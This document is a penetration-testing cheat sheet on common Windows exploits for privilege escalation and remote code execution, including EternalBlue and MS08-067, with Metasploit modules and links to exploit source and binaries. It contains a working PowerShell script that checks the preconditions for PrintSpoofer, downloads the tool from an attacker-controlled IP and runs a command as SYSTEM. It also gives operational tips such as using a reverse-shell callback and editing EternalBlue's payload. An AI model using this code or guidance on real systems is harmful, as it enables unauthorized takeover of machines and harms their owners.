Common Exploits

Privilege escalation

KiTrap0D

Allows escalation of privileges to SYSTEM on 32-bit Windows NT/2000/2003/2008/XP/Vista/7 (MS10-015, the VDM #GP trap handler bug). 64-bit installs are not affected.

msf modules

exploit/windows/local/ms10_015_kitrap0d

Source code

https://www.exploit-db.com/exploits/11199

afd.sys exploit

Allows escalation of privileges to SYSTEM on Microsoft Windows XP/2003 (MS11-080, AfdJoinLeaf in afd.sys)

msf module

exploit/windows/local/ms11_080_afdjoinleaf

Source code

https://www.exploit-db.com/exploits/18176

Client Copy Image (MS15-051)

Allows escalation of privileges on Windows 7/2008 R2 and earlier (CVE-2015-1701, win32k ClientCopyImage)

msf module

exploit/windows/local/ms15_051_client_copy_image

Source code

https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip

Compiled executables

#x86 exec
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-32.exe
#x64 exec
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-64.exe

MS16-032

Allows escalation of privileges on Windows 7 through 10 / 2008 through 2012 R2 (CVE-2016-0099, Secondary Logon service handle leak). Needs more than one CPU core to win the race reliably.

msf modules

exploit/windows/local/ms16_032_secondary_logon_handle_privesc

Source code

https://www.exploit-db.com/exploits/39574/
#powershell
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

Compiled exe

https://github.com/Meatballs1/ms16-032

PrintSpoofer

Escalates to SYSTEM on Windows Server 2016, Windows Server 2019 and Windows 10. The calling user must hold SeImpersonatePrivilege (typical for service accounts such as IIS, MSSQL or scheduled-task identities) and the Print Spooler service must be running, because the exploit coaxes the spooler into connecting to a named pipe it controls. Download the executable onto the target from the repository below and run it:

https://github.com/dievus/printspoofer

PrintSpoofer.exe -i -c cmd
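The two preconditions above are cheap to verify before running the binary, so here is an added example wrapper (not part of the original page nor of the PrintSpoofer project) that checks for SeImpersonatePrivilege and the Spooler service, fetches the executable and launches it. The staging URL and drop path are assumptions; point them at wherever you actually host the binary.

```powershell
# Added example, not from the original page or the PrintSpoofer project.
# Run on the target in the low-privileged shell you already have.

function Test-ImpersonatePrivilege {
    # Parse `whoami /priv`. The privilege only needs to be present;
    # "Disabled" is fine because PrintSpoofer enables it itself.
    $lines = whoami /priv | Select-String -Pattern '^Se\w+Privilege'
    foreach ($line in $lines) {
        $name = ($line.Line -split '\s+')[0]
        if ($name -eq 'SeImpersonatePrivilege') { return $true }
    }
    return $false
}

function Test-SpoolerRunning {
    # PrintSpoofer needs the Print Spooler to answer its RPC request.
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    return ($null -ne $svc -and $svc.Status -eq 'Running')
}

function Invoke-PrintSpoofer {
    param(
        # Assumed: an HTTP server you control that serves PrintSpoofer.exe
        [string]$Url     = 'http://10.10.14.2/PrintSpoofer.exe',
        # Assumed drop location on the target
        [string]$Path    = (Join-Path $env:TEMP 'PrintSpoofer.exe'),
        # Command to run as SYSTEM; use a reverse shell one-liner if the
        # session is not interactive (then drop -i below)
        [string]$Command = 'cmd'
    )

    if (-not (Test-ImpersonatePrivilege)) {
        Write-Warning 'SeImpersonatePrivilege not held; PrintSpoofer will fail.'
        return
    }
    if (-not (Test-SpoolerRunning)) {
        Write-Warning 'Print Spooler is not running; PrintSpoofer will fail.'
        return
    }

    Invoke-WebRequest -Uri $Url -OutFile $Path -UseBasicParsing

    # -i : interact with the new process in the current console
    # -c : command to execute as SYSTEM
    & $Path -i -c $Command
}

Invoke-PrintSpoofer
```

If you are coming in through a non-interactive channel (a webshell, for instance), omit `-i` and pass a command that calls back to you; the interactive flag only makes sense when you can see the spawned console.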

Remote code execution

Net Api exploit

Allows unauthenticated remote code execution via the Server service (MS08-067) on Windows 2000, XP up to SP3 and Server 2003. Requires SMB (TCP 445 or 139) to be reachable and the SRVSVC named pipe to be accessible, which on these versions normally needs no credentials; an open share is not required.

msf modules

exploit/windows/smb/ms08_067_netapi

Source code

https://www.exploit-db.com/exploits/40279
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py

Eternal Blue

Grants remote code execution on unpatched Windows versions from XP/Server 2003 through Windows 10/Server 2016 that expose SMBv1 (MS17-010). Requires TCP 445 reachable. The ms17_010_psexec and ms17_010_command modules additionally need an accessible named pipe (null session or valid credentials). ms17_010_eternalblue corrupts the kernel pool and can crash the target, so run the scanner module first and prefer ms17_010_psexec when a pipe is available.

msf modules

auxiliary/admin/smb/ms17_010_command          MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010            MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue      MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec           MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Source code

Edit the smb_pwn function in the exploit's source code (EDB 42315, worawit's zzz_exploit.py) to alter what it does once it has SYSTEM-level SMB access. By default it creates a file named pwned.txt in C:\ as a proof of exploitation. It depends on the mysmb.py helper linked below.

https://www.exploit-db.com/exploits/42315
#mysmb.py library
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
